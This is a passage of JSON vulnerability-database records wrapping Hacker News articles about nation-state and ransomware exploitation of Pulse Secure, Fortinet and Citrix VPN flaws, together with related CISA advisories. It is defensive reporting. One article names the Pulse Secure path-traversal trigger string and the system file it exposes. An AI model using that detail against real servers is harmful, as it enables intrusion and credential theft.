"AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379", "CVE-2019-11510", "CVE-2019-1579", "CVE-2019-19781"], "modified": "2020-02-18T15:13:08", "id": "THN:9994A9D5CFB76851BB74C8AD52F3DBBE", "href": "https://thehackernews.com/2020/02/iranian-hackers-vpn-vulnerabilities.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:40:09", "description": "[](<https://thehackernews.com/images/-S81ZTpL3VW0/X2CFi_g7l0I/AAAAAAAAAww/bXeyXz56F-0V-P2VhHdoO5qJllbhNqfswCLcBGAsYHQ/s728-e100/hacking.jpg>)\n\nThe US Cybersecurity and Infrastructure Security Agency (CISA) issued a [new advisory](<https://us-cert.cisa.gov/ncas/alerts/aa20-258a>) on Monday about a wave of cyberattacks carried by Chinese nation-state actors targeting US government agencies and private entities. \n \n\"CISA has observed Chinese [Ministry of State Security]-affiliated cyber threat actors operating from the People's Republic of China using commercially available information sources and open-source exploitation tools to target US Government agency networks,\" the cybersecurity agency said. \n \nOver the past 12 months, the victims were identified through sources such as [Shodan](<https://www.shodan.io/>), the Common Vulnerabilities and Exposure ([CVE](<https://cve.mitre.org/>)) database, and the National Vulnerabilities Database (NVD), exploiting the public release of a vulnerability to pick vulnerable targets and further their motives. \n \nBy compromising legitimate websites and leveraging spear-phishing emails with malicious links pointing to attacker-owned sites in order to gain initial access, the Chinese threat actors have deployed open-source tools such as [Cobalt Strike](<https://www.cobaltstrike.com/>), [China Chopper Web Shell](<https://blog.talosintelligence.com/2019/08/china-chopper-still-active-9-years-later.html>), and [Mimikatz](<https://github.com/gentilkiwi/mimikatz>) credential stealer to extract sensitive information from infected systems. \n \nThat's not all. Taking advantage of the fact that organizations aren't quickly mitigating known software vulnerabilities, the state-sponsored attackers are \"targeting, scanning, and probing\" US government networks for unpatched flaws in F5 Networks Big-IP Traffic Management User Interface ([CVE-2020-5902](<https://support.f5.com/csp/article/K52145254>)), Citrix VPN ([CVE-2019-19781](<https://www.citrix.com/blogs/2020/01/24/citrix-releases-final-fixes-for-cve-2019-19781/>)), Pulse Secure VPN ([CVE-2019-11510](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101>)), and Microsoft Exchange Servers ([CVE-2020-0688](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0688>)) to compromise targets. \n \n\"Cyber threat actors also continue to identify large repositories of credentials that are available on the internet to enable brute-force attacks,\" the agency said. \"While this sort of activity is not a direct result of the exploitation of emergent vulnerabilities, it demonstrates that cyber threat actors can effectively use available open-source information to accomplish their goals.\" \n \nThis is not the first time Chinese actors have worked on behalf of China's MSS to infiltrate various industries across the US and other countries. \n \nIn July, the US Department of Justice (DoJ) [charged two Chinese nationals](<https://thehackernews.com/2020/07/chinese-hackers-covid19.html>) for their alleged involvement in a decade-long hacking spree spanning high tech manufacturing, industrial engineering, defense, educational, gaming software, and pharmaceutical sectors with an aim to steal trade secrets and confidential business information. \n \nBut it's not just China. Earlier this year, Israeli security firm ClearSky uncovered a cyberespionage campaign dubbed \"[Fox Kitten](<https://thehackernews.com/2020/02/iranian-hackers-vpn-vulnerabilities.html>)\" that targeted government, aviation, oil and gas, and security companies by exploiting unpatched VPN vulnerabilities to penetrate and steal information from target companies, prompting CISA to issue [multiple security alerts](<https://thehackernews.com/2020/04/pulse-secure-vpn-vulnerability.html>) urging businesses to secure their VPN environments. \n \nStating that sophisticated cyber threat actors will continue to use open-source resources and tools to single out networks with low-security posture, CISA has recommended organizations to patch [routinely exploited vulnerabilities](<https://us-cert.cisa.gov/ncas/alerts/aa20-133a>), and \"audit their configuration and patch management programs to ensure they can track and mitigate emerging threats.\"\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-09-15T09:14:00", "type": "thn", "title": "CISA: Chinese Hackers Exploiting Unpatched Devices to Target U.S. Agencies", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11510", "CVE-2019-19781", "CVE-2020-0688", "CVE-2020-5902"], "modified": "2020-09-15T09:14:30", "id": "THN:0E6CD47141AAF54903BD6C1F9BD96F44", "href": "https://thehackernews.com/2020/09/chinese-hackers-agencies.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:38:20", "description": "[](<https://thehackernews.com/images/-LTN8ZEVASAQ/YHhnaI6y7gI/AAAAAAAACSI/-4R4GM5jnigOmkENHKFJXtyjjp1f6w4QQCLcBGAsYHQ/s0/us-sanctions-russia-solarwinds-hack.jpg>)\n\nThe U.S. and U.K. on Thursday formally attributed the supply chain attack of IT infrastructure management company SolarWinds with \"high confidence\" to government operatives working for Russia's Foreign Intelligence Service (SVR).\n\n\"Russia's pattern of malign behaviour around the world \u2013 whether in cyberspace, in election interference or in the aggressive operations of their intelligence services \u2013 demonstrates that Russia remains the most acute threat to the U.K.'s national and collective security,\" the U.K. government [said](<https://www.gov.uk/government/news/russia-uk-and-us-expose-global-campaigns-of-malign-activity-by-russian-intelligence-services>) in a statement.\n\nTo that effect, the U.S. Department of the Treasury has imposed sweeping sanctions against Russia for \"undermining the conduct of free and fair elections and democratic institutions\" in the U.S. and for its role in facilitating the sprawling SolarWinds hack, while also barring six technology companies in the country that provide support to the cyber program run by Russian Intelligence Services.\n\n[](<https://thehackernews.com/images/-3aKGKEh2OCw/YHhnxG35qkI/AAAAAAAACSQ/DNi8MHTziNkZeNqP2Y6g9DXrwuwcIBooQCLcBGAsYHQ/s0/russian-hacker.jpg>)\n\nThe companies include ERA Technopolis, Pasit, Federal State Autonomous Scientific Establishment Scientific Research Institute Specialized Security Computing Devices and Automation (SVA), Neobit, Advanced System Technology, and Pozitiv Teknolodzhiz (Positive Technologies), the last three of which are IT security firms whose customers are said to include the Russian Ministry of Defense, SVR, and Russia's Federal Security Service (FSB).\n\n\"As a company, we deny the groundless accusations made by the U.S. Department of the Treasury,\" Positive Technologies [said](<https://www.ptsecurity.com/ww-en/about/news/positive-technologies-official-statement-following-u-s-sanctions/>) in a statement. \"In the almost 20 years we have been operating there has been no evidence of the results of Positive Technologies\u2019 research being used in violation of the principles of business transparency and the ethical exchange of information with the professional information security community.\"\n\nIn addition, the Biden administration is also [expelling ten members](<https://home.treasury.gov/policy-issues/financial-sanctions/recent-actions/20210415>) of Russia's diplomatic mission in Washington, D.C., including representatives of its intelligence services.\n\n\"The scope and scale of this compromise combined with Russia's history of carrying out reckless and disruptive cyber operations makes it a national security concern,\" the Treasury Department [said](<https://home.treasury.gov/news/press-releases/jy0127>). \"The SVR has put at risk the global technology supply chain by allowing malware to be installed on the machines of tens of thousands of SolarWinds' customers.\"\n\nFor its part, Moscow had previously [denied involvement](<https://thehackernews.com/2021/01/fbi-cisa-nsa-officially-blames-russia.html>) in the broad-scope SolarWinds campaign, stating \"it does not conduct offensive operations in the cyber domain.\"\n\nThe [intrusions](<https://thehackernews.com/2021/03/researchers-find-3-new-malware-strains.html>) came to light in December 2020 when FireEye and other cybersecurity firms revealed that the operators behind the espionage campaign managed to compromise the software build and code signing infrastructure of SolarWinds Orion platform as early as October 2019 to deliver the Sunburst backdoor with the goal of gathering sensitive information.\n\nUp to 18,000 SolarWinds customers are believed to have received the trojanized Orion update, although the attackers carefully selected their targets, opting to escalate the attacks only in a handful of cases by deploying Teardrop malware based on an initial reconnaissance of the target environment for high-value accounts and assets.\n\n[](<https://thehackernews.com/images/-K6oDMn9wijo/YHhoAIB7XMI/AAAAAAAACSU/SnX4nr33cRUwtWpMv58gmUlwM1J3GLbGwCLcBGAsYHQ/s0/hack.jpg>)\n\nThe adversary's compromise of the SolarWinds software supply chain is said to have given it the ability to remotely spy or potentially disrupt more than 16,000 computer systems worldwide, according to the [executive order](<https://www.whitehouse.gov/briefing-room/statements-releases/2021/04/15/fact-sheet-imposing-costs-for-harmful-foreign-activities-by-the-russian-government/>) issued by the U.S. government.\n\nBesides infiltrating the networks of [Microsoft](<https://thehackernews.com/2020/12/microsoft-says-its-systems-were-also.html>), [FireEye](<https://thehackernews.com/2020/12/us-agencies-and-fireeye-were-hacked.html>), [Malwarebytes](<https://thehackernews.com/2021/01/solarwinds-hackers-also-breached.html>), and [Mimecast](<https://thehackernews.com/2021/03/mimecast-finds-solarwinds-hackers-stole.html>), the attackers are also said to have used SolarWinds as a stepping stone to breaching several U.S. agencies such as the National Aeronautics and Space Administration (NASA), the Federal Aviation Administration (FAA), and the Departments of State, Justice, Commerce, Homeland Security, Energy, Treasury, and the National Institutes of Health.\n\nThe SVR actor is also known by other names such as APT29, Cozy Bear, and The Dukes, with the threat group being tracked under different monikers, including UNC2452 (FireEye), SolarStorm (Palo Alto Unit 42), StellarParticle (CrowdStrike), Dark Halo (Volexity), and Nobelium (Microsoft).\n\n[](<https://thehackernews.com/images/-JJfhuyyCe1A/YHhoT2JBRoI/AAAAAAAACSg/KKZjhhWheAYDqRlyZsylSiqZ6TohQDq4ACLcBGAsYHQ/s0/cyberattack.jpg>)\n\nFurthermore, the National Security Agency (NSA), the Cybersecurity and Infrastructure Security Agency (CISA), and the Federal Bureau of Investigation (FBI) have jointly released an [advisory](<https://www.nsa.gov/News-Features/Feature-Stories/Article-View/Article/2573391/russian-foreign-intelligence-service-exploiting-five-publicly-known-vulnerabili/>), warning businesses of active exploitation of five publicly known vulnerabilities by APT29 to gain initial footholds into victim devices and networks \u2014 \n\n * [**CVE-2018-13379**](<https://nvd.nist.gov/vuln/detail/CVE-2018-13379>) \\- Fortinet FortiGate VPN\n * [**CVE-2019-9670**](<https://nvd.nist.gov/vuln/detail/CVE-2019-9670>) \\- Synacor Zimbra Collaboration Suite\n * [**CVE-2019-11510**](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>) \\- Pulse Secure Pulse Connect Secure VPN\n * [**CVE-2019-19781**](<https://nvd.nist.gov/vuln/detail/CVE-2019-19781>) \\- Citrix Application Delivery Controller and Gateway \n * [**CVE-2020-4006**](<https://nvd.nist.gov/vuln/detail/CVE-2020-4006>) \\- VMware Workspace ONE Access\n\nIn a statement shared with The Hacker News, Pulse Secure said the issue identified by the NSA concerns a flaw that was patched on [legacy deployments in April 2019](<https://thehackernews.com/2020/04/pulse-secure-vpn-vulnerability.html>), and that \"customers who followed the instructions in a Pulse Secure security advisory issued at that time have properly protected their systems and mitigated the threat.\"\n\n\"We see what Russia is doing to undermine our democracies,\" said U.K. Foreign Secretary Dominic Raab. \"The U.K. and U.S. are calling out Russia's malicious behaviour, to enable our international partners and businesses at home to better defend and prepare themselves against this kind of action.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-04-15T16:55:00", "type": "thn", "title": "US Sanctions Russia and Expels 10 Diplomats Over SolarWinds Cyberattack", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379", "CVE-2019-11510", "CVE-2019-19781", "CVE-2019-9670", "CVE-2020-4006"], "modified": "2021-06-04T10:27:04", "id": "THN:461B7AEC7D12A32B4ED085F0EA213502", "href": "https://thehackernews.com/2021/04/us-sanctions-russia-and-expels-10.html", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:38:18", "description": "[](<https://thehackernews.com/images/-aP3rCXOUpiQ/YIfVcfAWodI/AAAAAAAACX8/f_RfGI2QOewvk7Zu4AaGOKQyirlBpfKfACLcBGAsYHQ/s0/russian-hackers.jpg>)\n\nThe U.S. Cybersecurity and Infrastructure Security Agency (CISA), Department of Homeland Security (DHS), and the Federal Bureau of Investigation (FBI) on Monday published a new joint advisory as part of their latest attempts to expose the tactics, techniques, and procedures (TTPs) adopted by the Russian Foreign Intelligence Service (SVR) in its attacks targeting the U.S and foreign entities.\n\nBy employing \"stealthy intrusion tradecraft within compromised networks,\" the intelligence agencies [said](<https://us-cert.cisa.gov/ncas/current-activity/2021/04/26/fbi-dhs-cisa-joint-advisory-russian-foreign-intelligence-service>), \"the SVR activity\u2014which includes the recent [SolarWinds Orion supply chain compromise](<https://thehackernews.com/2021/04/researchers-find-additional.html>)\u2014primarily targets government networks, think tank and policy analysis organizations, and information technology companies and seeks to gather intelligence information.\"\n\nThe cyber actor is also being tracked under different monikers, including Advanced Persistent Threat 29 (APT29), the Dukes, CozyBear, and Yttrium. The development comes as the U.S. sanctioned Russia and [formally pinned](<https://thehackernews.com/2021/04/us-sanctions-russia-and-expels-10.html>) the SolarWinds hack and related cyberespionage campaign to government operatives working for SVR.\n\n[APT29](<https://malpedia.caad.fkie.fraunhofer.de/actor/apt_29>), since emerging on the threat landscape in 2013, has been tied to a number of attacks orchestrated with an aim to gain access to victim networks, move within victim environments undetected, and extract sensitive information. But in a noticeable shift in tactics in 2018, the actor moved from deploying malware on target networks to striking cloud-based email services, a fact borne by the SolarWinds attack, wherein the actor leveraged Orion binaries as an intrusion vector to exploit Microsoft Office 365 environments.\n\nThis similarity in post-infection tradecraft with other SVR-sponsored attacks, including in the manner the adversary laterally moved through the networks to obtain access to email accounts, is said to have played a huge role in attributing the SolarWinds campaign to the Russian intelligence service, despite a notable departure in the method used to gain an initial foothold.\n\n\"Targeting cloud resources probably reduces the likelihood of detection by using compromised accounts or system misconfigurations to blend in with normal or unmonitored traffic in an environment not well defended, monitored, or understood by victim organizations,\" the agency noted.\n\nAmong some of the other tactics put to use by APT29 are password spraying (observed during a 2018 compromise of a large unnamed network), exploiting zero-day flaws against virtual private network appliances (such as [CVE-2019-19781](<https://nvd.nist.gov/vuln/detail/CVE-2019-19781>)) to obtain network access, and deploying a Golang malware called [WELLMESS](<https://blogs.jpcert.or.jp/en/2018/07/malware-wellmes-9b78.html>) to plunder [intellectual property](<https://www.pwc.co.uk/issues/cyber-security-services/insights/wellmess-analysis-command-control.html>) from multiple organizations involved in COVID-19 vaccine development.\n\nBesides CVE-2019-19781, the threat actor is known to gain initial footholds into victim devices and networks by leveraging [CVE-2018-13379](<https://nvd.nist.gov/vuln/detail/CVE-2018-13379>), [CVE-2019-9670](<https://nvd.nist.gov/vuln/detail/CVE-2019-9670>), [CVE-2019-11510](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>), and [CVE-2020-4006](<https://nvd.nist.gov/vuln/detail/CVE-2020-4006>). Also in the mix is the practice of obtaining virtual private servers via false identities and cryptocurrencies, and relying on temporary VoIP telephone numbers and email accounts by making use of an anonymous email service called cock.li.\n\n\"The FBI and DHS recommend service providers strengthen their user validation and verification systems to prohibit misuse of their services,\" the advisory read, while also urging businesses to secure their networks from a compromise of trusted software.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-04-27T09:14:00", "type": "thn", "title": "FBI, CISA Uncover Tactics Employed by Russian Intelligence Hackers", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379", "CVE-2019-11510", "CVE-2019-19781", "CVE-2019-9670", "CVE-2020-4006"], "modified": "2021-04-28T06:42:30", "id": "THN:91A2A296EF8B6FD5CD8B904690E810E8", "href": "https://thehackernews.com/2021/04/fbi-cisa-uncover-tactics-employed-by.html", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:38:30", "description": "[](<https://thehackernews.com/images/-_SvUUuvh0ss/XpmKGXtsseI/AAAAAAAAAPI/SuMNxubahJUd3z_eE6vcjjgsuPoYjkdawCLcBGAsYHQ/s728-e100/pulse-secure-vpn-vulnerability-2.jpg>)\n\nThe United States Cybersecurity and Infrastructure Security Agency (CISA) yesterday issued a [fresh advisory](<https://www.us-cert.gov/ncas/alerts/aa20-107a>) alerting organizations to change all their Active Directory credentials as a defense against cyberattacks trying to leverage a known remote code execution (RCE) vulnerability in Pulse Secure VPN servers\u2014even if they have already patched it. \n \nThe warning comes three months after another [CISA alert](<https://www.us-cert.gov/ncas/alerts/aa20-010a>) urging users and administrators to [patch Pulse Secure VPN](<https://www.us-cert.gov/ncas/current-activity/2019/10/16/multiple-vulnerabilities-pulse-secure-vpn>) environments to thwart attacks exploiting the vulnerability. \n \n\"Threat actors who successfully exploited CVE-2019-11510 and stole a victim organization's credentials will still be able to access \u2014 and move laterally through \u2014 that organization's network after the organization has patched this vulnerability if the organization did not change those stolen credentials,\" CISA said. \n \nCISA has also [released a tool to help](<https://github.com/cisagov/check-your-pulse>) network administrators look for any indicators of compromise associated with the flaw. \n \n\n\n## A Remote Code Execution Flaw\n\n \nTracked as [CVE-2019-11510](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>), the pre-authentication arbitrary file read vulnerability could allow remote unauthenticated attackers to compromise vulnerable VPN servers and gain access to all active users and their plain-text credentials, and execute arbitrary commands. \n \n\n\n[](<https://thehackernews.com/images/-9lA8I2RLHGU/XpmBkUgmolI/AAAAAAAA2qg/xhY8D8d5TDs7mVoKQo3kFZmB8fmEu1yvwCLcBGAsYHQ/s728-e100/pulse-secure-vpn-vulnerability.jpg>)\n\n \nThe flaw stems from the fact that [directory traversal](<https://devco.re/blog/2019/09/02/attacking-ssl-vpn-part-3-the-golden-Pulse-Secure-ssl-vpn-rce-chain-with-Twitter-as-case-study/>) is hard-coded to be allowed if a path contains \"dana/html5/acc,\" thus allowing an attacker to send specially crafted URLs to read sensitive files, such as \"/etc/passwd\" that contains information about each user on the system. \n \nTo address this issue, Pulse Secure released an [out-of-band patch](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101/>) on April 24, 2019. \n \n[](<https://thehackernews.com/images/-JoiStCZj61c/XpmChlfPXpI/AAAAAAAAAO8/x_r1K3sIkukYxwR0UcxXPcNLaxvuDvrmQCLcBGAsYHQ/s728-e100/pulse-secure-vpn-vulnerability-1.jpg>) \n \nWhile on August 24, 2019, security intelligence firm Bad Packets was able to discover [14,528 unpatched](<https://badpackets.net/over-14500-pulse-secure-vpn-endpoints-vulnerable-to-cve-2019-11510/>) Pulse Secure servers, a subsequent scan as of last month yielded [2,099 vulnerable endpoints](<https://twitter.com/bad_packets/status/1242289478334427139>), indicating that a vast majority of organizations have patched their VPN gateways. \n \n\n\n## Unpatched VPN Servers Become Lucrative Target\n\n \nThe fact that there are still over thousands of unpatched Pulse Secure VPN servers has made them a lucrative target for bad actors to distribute malware. \n \nA report from ClearSky found Iranian state-sponsored [hackers using CVE-2019-11510](<https://thehackernews.com/2020/02/iranian-hackers-vpn-vulnerabilities.html>), among others, to penetrate and steal information from target IT and telecommunication companies across the world. \n \nAccording to an [NSA advisory](<https://media.defense.gov/2019/Oct/07/2002191601/-1/-1/0/CSA-MITIGATING-RECENT-VPN-VULNERABILITIES.PDF>) from October 2019, the \"exploit code is freely available online via the Metasploit framework, as well as GitHub. Malicious cyber actors are actively using this exploit code.\" \n \nIn a similar alert issued last year, the UK's National Cyber Security Centre ([NCSC](<https://www.ncsc.gov.uk/news/alert-vpn-vulnerabilities>)) warned that advanced threat groups are exploiting the vulnerability to target government, military, academic, business, and healthcare organizations. \n \nMore recently, [Travelex](<https://www.bbc.com/news/business-51017852>), the foreign currency exchange and travel insurance firm, became a victim after cybercriminals planted Sodinokibi (REvil) [ransomware](<https://doublepulsar.com/big-game-ransomware-being-delivered-to-organisations-via-pulse-secure-vpn-bd01b791aad9>) on the company's networks via the Pulse Secure vulnerability. Although the ransomware operators demanded a ransom of $6 million (\u00a34.6 million), a [Wall Street Journal](<https://www.wsj.com/articles/travelex-paid-hackers-multimillion-dollar-ransom-before-hitting-new-obstacles-11586440800>) report last week said it paid $2.3 million in the form of 285 Bitcoin to resolve its problem. \n \nIn the face of ongoing attacks, it's recommended that organizations upgrade their Pulse Secure VPN, reset their credentials, and scan for unauthenticated log requests and exploit attempts. \n \nCISA has also suggested removing any unapproved remote access programs and inspecting scheduled tasks for scripts or executables that may allow an attacker to connect to an environment. \n \nFor more steps to mitigate the flaw, head to [NSA's advisory here](<https://media.defense.gov/2019/Oct/07/2002191601/-1/-1/0/CSA-MITIGATING-RECENT-VPN-VULNERABILITIES.PDF>).\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-04-17T11:20:00", "type": "thn", "title": "CISA Warns Patched Pulse Secure VPNs Could Still Expose Organizations to Hackers", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11510"], "modified": "2020-04-17T11:20:03", "id": "THN:46994B7A671ED65AD9975F25F514C6E3", "href": "https://thehackernews.com/2020/04/pulse-secure-vpn-vulnerability.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:38:22", "description": "[](<https://thehackernews.com/images/-wqhJpW-QhTc/YG79n_lop2I/AAAAAAAACNY/ZnMOyKz8e6Adj5Hy8a5WXa_-MbqnDgRLwCLcBGAsYHQ/s0/cyberattack.jpg>)\n\nUnpatched Fortinet VPN devices are being targeted in a series of attacks against industrial enterprises in Europe to deploy a new strain of ransomware called \"Cring\" inside corporate networks.\n\nAt least one of the hacking incidents led to the temporary shutdown of a production site, said cybersecurity firm Kaspersky in a report published on Wednesday, without publicly naming the victim.\n\nThe attacks happened in the first quarter of 2021, between January and March.\n\n\"Various details of the attack indicate that the attackers had carefully analyzed the infrastructure of the targeted organization and prepared their own infrastructure and toolset based on the information collected at the reconnaissance stage,\" [said](<https://ics-cert.kaspersky.com/reports/2021/04/07/vulnerability-in-fortigate-vpn-servers-is-exploited-in-cring-ransomware-attacks/>) Vyacheslav Kopeytsev, a security researcher at Kaspersky ICS CERT.\n\nThe disclosure comes days after the Federal Bureau of Investigation (FBI) and the Cybersecurity and Infrastructure Security Agency (CISA) [warned](<https://us-cert.cisa.gov/ncas/current-activity/2021/04/02/fbi-cisa-joint-advisory-exploitation-fortinet-fortios>) of advanced persistent threat (APT) actors actively scanning for Fortinet SSL VPN appliances vulnerable to CVE-2018-13379, among others.\n\n\"APT actors may use these vulnerabilities or other common exploitation techniques to gain initial access to multiple government, commercial, and technology services. Gaining initial access pre-positions the APT actors to conduct future attacks,\" the agency said.\n\n[](<https://thehackernews.com/images/-5QwYhR-6pQ0/YG794Oq_4BI/AAAAAAAACNg/cbtbheKh0Z4gm3R1vdQ6cdPUmQT6WjUNwCLcBGAsYHQ/s0/hack.jpg>)\n\n[CVE-2018-13379](<https://nvd.nist.gov/vuln/detail/CVE-2018-13379>) concerns a path traversal vulnerability in the FortiOS SSL VPN web portal, which allows unauthenticated attackers to read arbitrary system files, including the session file, which contains usernames and passwords stored in plaintext.\n\nAlthough patches for the vulnerability were released in [May 2019](<https://www.fortiguard.com/psirt/FG-IR-18-384>), Fortinet said last November that it identified a \"[large number](<https://www.fortinet.com/blog/psirt-blogs/update-regarding-cve-2018-13379>)\" of VPN appliances that remained unpatched, while also cautioning that IP addresses of those internet-facing vulnerable devices were being sold on the dark web.\n\nIn a statement shared with The Hacker News, Fortinet said it had urged customers to upgrade their appliances \"on multiple occasions in [August 2019](<https://www.fortinet.com/blog/psirt-blogs/fortios-ssl-vulnerability>), [July 2020](<https://www.fortinet.com/blog/psirt-blogs/atp-29-targets-ssl-vpn-flaws>), and again in [April 2021](<https://www.fortinet.com/blog/psirt-blogs/patch-vulnerability-management>)\" following the May 2019 fix. \"If customers have not done so, we urge them to immediately implement the upgrade and mitigations,\" the company said.\n\nThe attacks aimed at European businesses were no different, according to Kaspersky's incident response, which found that the deployment of Cring ransomware involved the exploitation of CVE-2018-13379 to gain access to the target networks.\n\n\"Some time prior to the main phase of the operation, the attackers performed test connections to the VPN Gateway, apparently in order to make sure that the stolen user credentials for the VPN were still valid,\" Kaspersky researchers said.\n\nUpon gaining access, the adversaries are said to have used the Mimikatz utility to siphon account credentials of Windows users who had previously logged in to the compromised system, then utilizing them to break into the domain administrator account, move laterally across the network, and eventually deploy the Cring ransomware on each machine remotely using the Cobalt Strike framework.\n\n[Cring](<https://malpedia.caad.fkie.fraunhofer.de/details/win.cring>), a nascent strain that was first observed in January 2021 by telecom provider Swisscom, encrypts specific files on the devices using strong encryption algorithms after removing traces of all backup files and terminating Microsoft Office and Oracle Database processes. Following successful encryption, it drops a ransom note demanding payment of two bitcoins.\n\n[](<https://thehackernews.com/images/-zg8HygZ73Eo/YG7-LtYB1JI/AAAAAAAACNo/wj8rvRY9io4E_QWg643XIdI94kejG4D5gCLcBGAsYHQ/s0/cybersecurity.jpg>)\n\nWhat's more, the threat actor was careful to hide their activity by disguising the malicious PowerShell scripts under the name \"kaspersky\" to evade detection and ensured that the server hosting the ransomware payload only responded to requests coming in from European countries.\n\n\"An analysis of the attackers' activity demonstrates that, based on the results of the reconnaissance performed on the attacked organization's network, they chose to encrypt those servers which the attackers believed would cause the greatest damage to the enterprise's operations if lost,\" Kopeytsev [said](<https://usa.kaspersky.com/about/press-releases/2021_na-cring-ransomware-infects-industrial-targets-through-vulnerability-in-vpn-servers>).\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 